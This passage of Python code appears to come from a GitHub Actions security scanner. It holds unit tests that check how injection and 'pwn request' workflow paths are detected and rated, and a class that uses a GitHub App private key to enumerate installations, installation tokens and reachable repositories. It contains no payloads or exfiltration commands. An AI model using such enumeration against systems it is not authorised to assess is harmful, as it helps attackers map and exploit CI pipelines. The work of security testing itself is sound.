        # Setup mock workflow node with workflow_run tag
        mock_workflow_node = MagicMock()
        mock_workflow_node.get_tags.return_value = ["WorkflowNode", "workflow_run"]
        mock_workflow_node.repo_name.return_value = "owner/repo"
        mock_workflow_node.get_env_vars.return_value = {}

        # Setup mock job and step nodes
        mock_job_node = MagicMock()
        mock_job_node.get_tags.return_value = ["JobNode"]
        mock_job_node.deployments = []
        mock_job_node.get_env_vars.return_value = {}
        mock_job_node.outputs = None

        mock_step_node = MagicMock()
        mock_step_node.get_tags.return_value = ["StepNode", "injectable"]
        mock_step_node.contexts = ["github.event.issue.title"]

        path = [mock_workflow_node, mock_job_node, mock_step_node]

        mock_graph.get_nodes_for_tags.return_value = [mock_workflow_node]
        mock_graph.dfs_to_tag = AsyncMock()
        mock_graph.dfs_to_tag.side_effect = [
            [path],  # First call returns the main path
            None,  # permission_check call
            None,  # permission_blocker call
        ]

        # Mock repository as not fork
        with patch(
            "gatox.workflow_graph.visitors.injection_visitor.CacheManager"
        ) as mock_cache_manager:
            mock_repo = MagicMock()
            mock_repo.is_fork.return_value = False
            mock_cache_manager.return_value.get_repository.return_value = mock_repo

            with patch(
                "gatox.workflow_graph.visitors.injection_visitor.VisitorUtils"
            ) as mock_visitor_utils:
                mock_visitor_utils._add_results.return_value = None

                with patch(
                    "gatox.workflow_graph.visitors.injection_visitor.getToken"
                ) as mock_get_token:
                    mock_get_token.return_value = "github.event.issue.title"

                    with patch(
                        "gatox.workflow_graph.visitors.injection_visitor.checkUnsafe"
                    ) as mock_check_unsafe:
                        mock_check_unsafe.return_value = True

                        await InjectionVisitor.find_injections(mock_graph, mock_api)

                        # Should use PREVIOUS_CONTRIBUTOR complexity for workflow_run
                        mock_visitor_utils._add_results.assert_called()
                        # Check the complexity argument in the call
                        call_args = mock_visitor_utils._add_results.call_args
                        assert call_args[1]["complexity"].name == "PREVIOUS_CONTRIBUTOR"



import logging
from typing import Any

from gatox.cli.output import Output
from gatox.enumerate.enumerate import Enumerator
from gatox.github.api import Api
from gatox.github.app_auth import GitHubAppAuth
from gatox.models.execution import Execution
from gatox.models.repository import Repository

logger = logging.getLogger(__name__)


class AppEnumerator:
    """Handles GitHub App enumeration capabilities."""

    def __init__(
        self,
        app_id: str,
        private_key_path: str,
        socks_proxy: str = None,
        http_proxy: str = None,
        github_url: str = "https://api.github.com",
        skip_log: bool = True,
        ignore_workflow_run: bool = False,
        deep_dive: bool = False,
    ):
        """Initialize App Enumerator.

        Args:
            app_id: GitHub App ID
            private_key_path: Path to private key PEM file
            socks_proxy: SOCKS proxy configuration
            http_proxy: HTTP proxy configuration
            github_url: GitHub API URL
            skip_log: Skip runner log analysis
            ignore_workflow_run: Ignore workflow_run triggers
            deep_dive: Perform deep dive analysis
        """
        self.app_id = app_id
        self.private_key_path = private_key_path
        self.socks_proxy = socks_proxy
        self.http_proxy = http_proxy
        self.github_url = github_url
        self.skip_log = skip_log
        self.ignore_workflow_run = ignore_workflow_run
        self.deep_dive = deep_dive

        # Initialize App authentication
        self.app_auth = GitHubAppAuth(app_id, private_key_path)

        # This will be set when we generate the JWT
        self.api = None
        self.__app_permissions = None

    async def _initialize_api_with_jwt(self):
        """Initialize API with JWT token."""
        jwt_token = self.app_auth.generate_jwt()
        self.api = Api(
            jwt_token,
            socks_proxy=self.socks_proxy,
            http_proxy=self.http_proxy,
            github_url=self.github_url,
        )

    async def validate_app(self) -> dict[str, Any]:
        """Validate the GitHub App and return basic information."""
        if not self.api:
            await self._initialize_api_with_jwt()

        app_info = await self.api.get_app_info()
        if not app_info:
            raise ValueError(
                "Failed to validate GitHub App - check App ID and private key"
            )

        self.__app_permissions = [
            f"{k}:{v}" for k, v in app_info["permissions"].items()
        ]

        Output.info(f"Successfully authenticated as GitHub App: {app_info['name']}")
        Output.info(f"App ID: {app_info['id']}")
        Output.info(f"Owner: {app_info['owner']['login']}")
        Output.info(f"Permissions: {Output.yellow(', '.join(self.__app_permissions))}")

        return app_info

    def report_installations(self, installations: list[dict[str, Any]]):
        """Report the installations found."""
        if installations:
            for installation in installations:
                Output.info(f"Installation ID: {Output.yellow(installation['id'])}")
                Output.tabbed(
                    f"Account/Org: {Output.bright(installation['account']['login'])}"
                )
                if "repositories" in installation:
                    Output.tabbed(f"Repositories: {len(installation['repositories'])}")
                    for repo in installation["repositories"][:5]:  # Show first 5
                        Output.tabbed(f"  - {repo['full_name']}")
                    if len(installation["repositories"]) > 5:
                        Output.tabbed(
                            f"  ... and {len(installation['repositories']) - 5} more"
                        )
        else:
            Output.warn("No installations found")

    async def list_installations(self) -> list[dict[str, Any]]:
        """List all installations for the GitHub App."""
        if not self.api:
            await self._initialize_api_with_jwt()

        installations = await self.api.get_app_installations()
        if not installations:
            Output.error("No installations found or failed to retrieve installations")
            return []

        Output.info(f"Found {len(installations)} installation(s)")

        enhanced_installations = []
        for installation in installations:
            # Get detailed installation info
            install_info = await self.api.get_installation_info(installation["id"])
            if install_info:
                # Get repositories for this installation
                repos_info = await self.api.get_installation_repositories(
                    installation["id"]
                )
                install_info["accessible_repositories"] = repos_info
                enhanced_installations.append(install_info)
            else:
                enhanced_installations.append(installation)

        return enhanced_installations

    async def enumerate_installation(self, installation_id: str) -> list[Repository]:
        """Enumerate a specific installation."""
        if not self.api:
            await self._initialize_api_with_jwt()

        if (
            "contents:read" not in self.__app_permissions
            and "contents:write" not in self.__app_permissions
        ):
            Output.error(
                "App does not have contents permissions, cannot enumerate repositories"
            )
            return []

        Output.info(f"Enumerating installation {installation_id}")

        # Get installation access token
        access_token_response = await self.api.get_installation_access_token(
            installation_id
        )
        if not access_token_response:
            Output.error(
                f"Failed to get access token for installation {installation_id}"
            )
            return None

        # Create new API instance with installation token
        installation_token = access_token_response["token"]
        installation_api = Api(
            installation_token,
            socks_proxy=self.socks_proxy,
            http_proxy=self.http_proxy,
            github_url=self.github_url,
        )

        # Get installation repositories
        installation_repos = await installation_api.get_installation_repos()
        if not installation_repos:
            Output.error(f"No repositories found for installation {installation_id}")
            return None

        Output.info(
            f"Found {installation_repos['total_count']} repositories in installation"
        )

        # Create standard enumerator with installation token
        enumerator = Enumerator(
            socks_proxy=self.socks_proxy,
            http_proxy=self.http_proxy,
            skip_log=self.skip_log,
            github_url=self.github_url,
            ignore_workflow_run=self.ignore_workflow_run,
            deep_dive=self.deep_dive,
            finegrained_permisions=self.__app_permissions,
            api_client=installation_api,
        )

        # Enumerate repositories
        repos_to_enumerate = [
            repo["full_name"] for repo in installation_repos["repositories"]
        ]
        enumerated_repos = await enumerator.enumerate_repos(repos_to_enumerate)

        await installation_api.close()

        return enumerated_repos

    async def enumerate_all_installations(self) -> list[Execution]:
        """Enumerate all installations accessible to the GitHub App."""
        installations = await self.list_installations()

        results = []
        for installation in installations:
            installation_id = installation["id"]
            Output.info(
                f"Enumerating installation {installation_id} ({installation.get('account', {}).get('login', 'Unknown')})"
            )

            try:
                result = await self.enumerate_installation(str(installation_id))
                if result:
                    results.append(result)
            except Exception as e:
                Output.error(
                    f"Failed to enumerate installation {installation_id}: {str(e)}"
                )
                continue

        return results

    async def close(self):
        """Close API connections."""
        if self.api:
            await self.api.close()



from unittest.mock import MagicMock, patch

import pytest

from gatox.enumerate.results.complexity import Complexity
from gatox.enumerate.results.confidence import Confidence
from gatox.enumerate.results.issue_type import IssueType
from gatox.github.api import Api
from gatox.workflow_graph.graph.tagged_graph import TaggedGraph
from gatox.workflow_graph.visitors.pwn_request_visitor import PwnRequestVisitor
from gatox.workflow_graph.visitors.visitor_utils import VisitorUtils


@pytest.fixture
def mock_graph():
    return MagicMock(spec=TaggedGraph)


@pytest.fixture
def mock_api():
    return MagicMock(spec=Api)


@pytest.fixture
def mock_cache_manager():
    with patch(
        "gatox.workflow_graph.visitors.pwn_request_visitor.CacheManager"
    ) as MockCache:
        instance = MockCache.return_value
        instance.get_repository.return_value = MagicMock(is_fork=lambda: False)
        yield instance


async def test_find_pwn_requests_no_nodes(mock_graph, mock_api, mock_cache_manager):
    mock_graph.get_nodes_for_tags.return_value = []
    with patch.object(VisitorUtils, "add_repo_results"):
        await PwnRequestVisitor.find_pwn_requests(mock_graph, mock_api)


async def test_find_pwn_requests_with_nodes(mock_graph, mock_api, mock_cache_manager):
    node = MagicMock()
    mock_graph.get_nodes_for_tags.return_value = [node]
    mock_graph.dfs_to_tag.return_value = [[node]]

    with (
        patch.object(PwnRequestVisitor, "_process_single_path") as mock_process,
        patch.object(VisitorUtils, "add_repo_results"),
    ):
        await PwnRequestVisitor.find_pwn_requests(mock_graph, mock_api)
        mock_process.assert_called_once()


async def test_process_single_path_with_permission_check(
    mock_graph, mock_api, mock_cache_manager
):
    """
    Test that permission checks cause approval gate to be set and path continues.
    """
    # Create mock nodes for the path
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    job_node = MagicMock()
    job_node.get_tags.return_value = ["JobNode"]
    job_node.deployments = None
    job_node.outputs = None
    job_node.repo_name.return_value = "test/repo"

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "refs/heads/main"
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    # Create sink node
    sink_node = MagicMock()
    sink_node.get_tags.return_value = ["sink"]

    # Set up the path
    path = [workflow_node, job_node, checkout_step]

    # Mock the graph DFS calls with ignore_depends parameter
    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            return []  # No permission blockers
        elif tag == "permission_check":
            return [[MagicMock()]]  # Found permission check
        elif tag == "sink":
            return [[sink_node]]
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect

    # Mock API calls
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    # Mock VisitorUtils methods
    with (
        patch.object(VisitorUtils, "process_context_var", return_value="processed"),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):

        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Verify that results were added with TOCTOU complexity due to approval gate
        mock_add_results.assert_called_once()
        call_args = mock_add_results.call_args

        # Check that the path was passed correctly
        assert call_args[0][0] == path
        assert call_args[0][1] == results
        assert call_args[0][2] == IssueType.PWN_REQUEST

        # Verify complexity is TOCTOU due to approval gate
        assert call_args[1]["complexity"] == Complexity.TOCTOU
        assert call_args[1]["confidence"] == Confidence.HIGH  # Sink found


async def test_process_single_path_blocker_breaks_execution(
    mock_graph, mock_api, mock_cache_manager
):
    """
    Test that finding a permission blocker breaks execution immediately.
    """
    # Create mock nodes
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    job_node = MagicMock()
    job_node.get_tags.return_value = ["JobNode"]
    job_node.deployments = None
    job_node.outputs = None
    job_node.repo_name.return_value = "test/repo"

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "refs/heads/main"
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    # Set up the path
    path = [workflow_node, job_node, checkout_step]

    # Mock the graph DFS calls with ignore_depends parameter
    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            # Return a blocker path - this should cause immediate break
            return [[MagicMock()]]
        elif tag == "permission_check":
            return []
        elif tag == "sink":
            return [[MagicMock()]]
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect

    # Mock API calls
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    # Mock VisitorUtils methods
    with (
        patch.object(VisitorUtils, "process_context_var", return_value="processed"),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):

        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Verify that results were NOT added (permission blocker caused break)
        mock_add_results.assert_not_called()


async def test_process_single_path_approval_gate_affects_complexity(
    mock_graph, mock_api, mock_cache_manager
):
    """
    Test that approval gate nodes in the path correctly affect complexity calculation.
    """
    # Create mock nodes
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    job_node = MagicMock()
    job_node.get_tags.return_value = ["JobNode"]
    job_node.deployments = None
    job_node.outputs = None
    job_node.repo_name.return_value = "test/repo"

    # This approval gate node is part of the main path
    approval_step = MagicMock()
    approval_step.get_tags.return_value = ["StepNode", "permission_check"]
    approval_step.is_checkout = False
    approval_step.outputs = None
    approval_step.hard_gate = False
    approval_step.soft_gate = False

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "refs/heads/main"
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    sink_node = MagicMock()
    sink_node.get_tags.return_value = ["sink"]

    # Path includes the approval gate node
    path = [workflow_node, job_node, approval_step, checkout_step]

    # Mock the graph DFS calls
    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            return []
        elif tag == "permission_check":
            # Return path that includes the approval_step (which is in main path)
            return [[approval_step]]
        elif tag == "sink":
            return [[sink_node]]
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect

    # Mock API calls
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    # Mock VisitorUtils methods
    with (
        patch.object(VisitorUtils, "process_context_var", return_value="processed"),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):

        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Verify that results were added
        mock_add_results.assert_called_once()
        call_args = mock_add_results.call_args

        # Check that complexity is TOCTOU due to effective approval gate
        assert call_args[1]["complexity"] == Complexity.TOCTOU
        assert call_args[1]["confidence"] == Confidence.HIGH


@pytest.mark.asyncio
async def test_process_single_path_job_node_with_deployments(
    mock_graph, mock_api, mock_cache_manager
):
    """Test job node with deployment environment rules"""
    # Create mock nodes
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    job_node = MagicMock()
    job_node.get_tags.return_value = ["JobNode"]
    job_node.deployments = ["production", {"name": "staging"}]
    job_node.outputs = None
    job_node.repo_name.return_value = "test/repo"

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "refs/heads/main"
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    path = [workflow_node, job_node, checkout_step]

    # Mock the graph DFS calls
    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            return []
        elif tag == "permission_check":
            return []
        elif tag == "sink":
            return [[MagicMock()]]
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect

    # Mock API to return environment rules that include our deployment
    mock_api.get_all_environment_protection_rules.return_value = {
        "production": {"required_reviewers": 1}
    }

    results = {}
    rule_cache = {}

    # Mock VisitorUtils methods
    with (
        patch.object(VisitorUtils, "process_context_var", return_value="production"),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):

        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Should call API to get environment protection rules
        mock_api.get_all_environment_protection_rules.assert_called_once_with(
            "test/repo"
        )

        # Verify approval gate was triggered and complexity is TOCTOU
        mock_add_results.assert_called_once()
        call_args = mock_add_results.call_args
        assert call_args[1]["complexity"] == Complexity.TOCTOU


@pytest.mark.asyncio
async def test_process_single_path_job_node_with_outputs_and_env_lookup(
    mock_graph, mock_api, mock_cache_manager
):
    """Test job node with outputs that reference environment variables"""
    # Create mock nodes
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {"MY_VAR": "github.event.repository.name"}
    workflow_node.repo_name.return_value = "test/repo"

    job_node = MagicMock()
    job_node.get_tags.return_value = ["JobNode"]
    job_node.deployments = None
    job_node.outputs = {
        "output1": "env.MY_VAR",  # References environment variable
        "output2": "static_value",  # Static value
        "output3": 123,  # Non-string value
    }
    job_node.repo_name.return_value = "test/repo"

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "inputs.output1"  # Uses job output
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    path = [workflow_node, job_node, checkout_step]

    # Mock the graph DFS calls
    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            return []
        elif tag == "permission_check":
            return []
        elif tag == "sink":
            return [[MagicMock()]]
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    with (
        patch.object(VisitorUtils, "process_context_var", return_value="output1"),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):

        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Should process the job outputs and environment variables
        mock_add_results.assert_called_once()


@pytest.mark.asyncio
async def test_process_single_path_step_node_with_outputs_and_env(
    mock_graph, mock_api, mock_cache_manager
):
    """Test step node with outputs containing environment references"""
    # Create mock nodes
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    step_node = MagicMock()
    step_node.get_tags.return_value = ["StepNode"]
    step_node.is_checkout = False
    step_node.outputs = {"step_output": "env.SOME_VAR"}
    step_node.hard_gate = False
    step_node.soft_gate = False

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "refs/heads/main"
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    path = [workflow_node, step_node, checkout_step]

    # Mock the graph DFS calls
    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            return []
        elif tag == "permission_check":
            return []
        elif tag == "sink":
            return [[MagicMock()]]
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    with (
        patch.object(VisitorUtils, "process_context_var", return_value="processed"),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):

        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Should process step outputs
        mock_add_results.assert_called_once()


@pytest.mark.asyncio
async def test_process_single_path_workflow_node_fork_repository(mock_graph, mock_api):
    """Test workflow node with fork repository detection"""
    with patch(
        "gatox.workflow_graph.visitors.pwn_request_visitor.CacheManager"
    ) as MockCache:
        # Mock fork repository
        fork_repo = MagicMock()
        fork_repo.is_fork.return_value = True
        instance = MockCache.return_value
        instance.get_repository.return_value = fork_repo

        workflow_node = MagicMock()
        workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
        workflow_node.excluded.return_value = False
        workflow_node.get_env_vars.return_value = {}
        workflow_node.repo_name.return_value = "fork/repo"

        step_node = MagicMock()
        step_node.get_tags.return_value = ["StepNode"]
        step_node.is_checkout = True
        step_node.metadata = "refs/heads/main"
        step_node.outputs = None
        step_node.hard_gate = False
        step_node.soft_gate = False

        path = [workflow_node, step_node]

        mock_graph.dfs_to_tag.return_value = []
        mock_api.get_all_environment_protection_rules.return_value = {}

        results = {}
        rule_cache = {}

        with patch.object(VisitorUtils, "_add_results") as mock_add_results:
            await PwnRequestVisitor._process_single_path(
                path, mock_graph, mock_api, rule_cache, results
            )

            # Should break early due to fork repository, no results added
            mock_add_results.assert_not_called()


@pytest.mark.asyncio
async def test_process_single_path_workflow_node_excluded(
    mock_graph, mock_api, mock_cache_manager
):
    """Test workflow node with excluded flag"""
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = True  # Excluded workflow
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    step_node = MagicMock()
    step_node.get_tags.return_value = ["StepNode"]
    step_node.is_checkout = True
    step_node.metadata = "refs/heads/main"

    path = [workflow_node, step_node]

    mock_graph.dfs_to_tag.return_value = []
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    with patch.object(VisitorUtils, "_add_results") as mock_add_results:
        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Should break early due to excluded workflow, no results added
        mock_add_results.assert_not_called()


@pytest.mark.asyncio
async def test_process_single_path_workflow_node_labeled_trigger(
    mock_graph, mock_api, mock_cache_manager
):
    """Test workflow node with pull_request_target:labeled trigger"""
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = [
        "WorkflowNode",
        "pull_request_target:labeled",
    ]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "refs/heads/main"
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    path = [workflow_node, checkout_step]

    # Mock the graph DFS calls
    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            return []
        elif tag == "permission_check":
            return []
        elif tag == "sink":
            return [[MagicMock()]]
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    with (
        patch.object(VisitorUtils, "process_context_var", return_value="processed"),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):

        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Should set approval gate due to labeled trigger and use TOCTOU complexity
        mock_add_results.assert_called_once()
        call_args = mock_add_results.call_args
        assert call_args[1]["complexity"] == Complexity.TOCTOU


@pytest.mark.asyncio
async def test_process_single_path_workflow_run_trigger(
    mock_graph, mock_api, mock_cache_manager
):
    """Test workflow_run trigger affects complexity"""
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "workflow_run"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "refs/heads/main"
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    path = [workflow_node, checkout_step]

    # Mock the graph DFS calls
    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            return []
        elif tag == "permission_check":
            return []
        elif tag == "sink":
            return [[MagicMock()]]
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    with (
        patch.object(VisitorUtils, "process_context_var", return_value="processed"),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):

        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Should use PREVIOUS_CONTRIBUTOR complexity for workflow_run
        mock_add_results.assert_called_once()
        call_args = mock_add_results.call_args
        assert call_args[1]["complexity"] == Complexity.PREVIOUS_CONTRIBUTOR


@pytest.mark.asyncio
async def test_process_single_path_step_node_hard_gate(
    mock_graph, mock_api, mock_cache_manager
):
    """Test step node with hard gate breaks execution"""
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    hard_gate_step = MagicMock()
    hard_gate_step.get_tags.return_value = ["StepNode"]
    hard_gate_step.is_checkout = False
    hard_gate_step.outputs = None
    hard_gate_step.hard_gate = True  # Hard gate
    hard_gate_step.soft_gate = False

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "refs/heads/main"
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    path = [workflow_node, hard_gate_step, checkout_step]

    mock_graph.dfs_to_tag.return_value = []
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    with patch.object(VisitorUtils, "_add_results") as mock_add_results:
        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Should break at hard gate, no results added
        mock_add_results.assert_not_called()


@pytest.mark.asyncio
async def test_process_single_path_step_node_soft_gate(
    mock_graph, mock_api, mock_cache_manager
):
    """Test step node with soft gate sets approval gate"""
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    soft_gate_step = MagicMock()
    soft_gate_step.get_tags.return_value = ["StepNode"]
    soft_gate_step.is_checkout = False
    soft_gate_step.outputs = None
    soft_gate_step.hard_gate = False
    soft_gate_step.soft_gate = True  # Soft gate

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "refs/heads/main"
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    path = [workflow_node, soft_gate_step, checkout_step]

    # Mock the graph DFS calls
    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            return []
        elif tag == "permission_check":
            return []
        elif tag == "sink":
            return [[MagicMock()]]
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    with (
        patch.object(VisitorUtils, "process_context_var", return_value="processed"),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):

        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Should set approval gate due to soft gate and use TOCTOU complexity
        mock_add_results.assert_called_once()
        call_args = mock_add_results.call_args
        assert call_args[1]["complexity"] == Complexity.TOCTOU


@pytest.mark.asyncio
async def test_process_single_path_action_node_initialization(
    mock_graph, mock_api, mock_cache_manager
):
    """Test action node initialization"""
    workflow_node = MagicMock()
    workflow_node.get_tags.return_value = ["WorkflowNode", "pull_request_target"]
    workflow_node.excluded.return_value = False
    workflow_node.get_env_vars.return_value = {}
    workflow_node.repo_name.return_value = "test/repo"

    action_node = MagicMock()
    action_node.get_tags.return_value = ["ActionNode"]

    checkout_step = MagicMock()
    checkout_step.get_tags.return_value = ["StepNode"]
    checkout_step.is_checkout = True
    checkout_step.metadata = "refs/heads/main"
    checkout_step.outputs = None
    checkout_step.hard_gate = False
    checkout_step.soft_gate = False

    path = [workflow_node, action_node, checkout_step]

    # Mock the graph DFS calls
    def mock_dfs_side_effect(node, tag, api, ignore_depends=False):
        if tag == "permission_blocker":
            return []
        elif tag == "permission_check":
            return []
        elif tag == "sink":
            return [[MagicMock()]]
        return []

    mock_graph.dfs_to_tag.side_effect = mock_dfs_side_effect
    mock_api.get_all_environment_protection_rules.return_value = {}

    results = {}
    rule_cache = {}

    with (
        patch.object(VisitorUtils, "process_context_var", return_value="processed"),
        patch.object(VisitorUtils, "check_mutable_ref", return_value=True),
        patch.object(VisitorUtils, "append_path"),
        patch.object(VisitorUtils, "initialize_action_node") as mock_init_action,
        patch.object(VisitorUtils, "_add_results") as mock_add_results,
    ):

        await PwnRequestVisitor._process_single_path(
            path, mock_graph, mock_api, rule_cache, results
        )

        # Should initialize action node
        mock_init_action.assert_called_once_with(mock_graph, mock_api, action_node)
        mock_add_results.assert_called_once()


@pytest.mark.asyncio
async def test_process_single_path_checkout_with_env_metadata(
    mock_graph, mock_api, mock_cache_manager
):
    """Test checkout step with environment variable in metadata"""
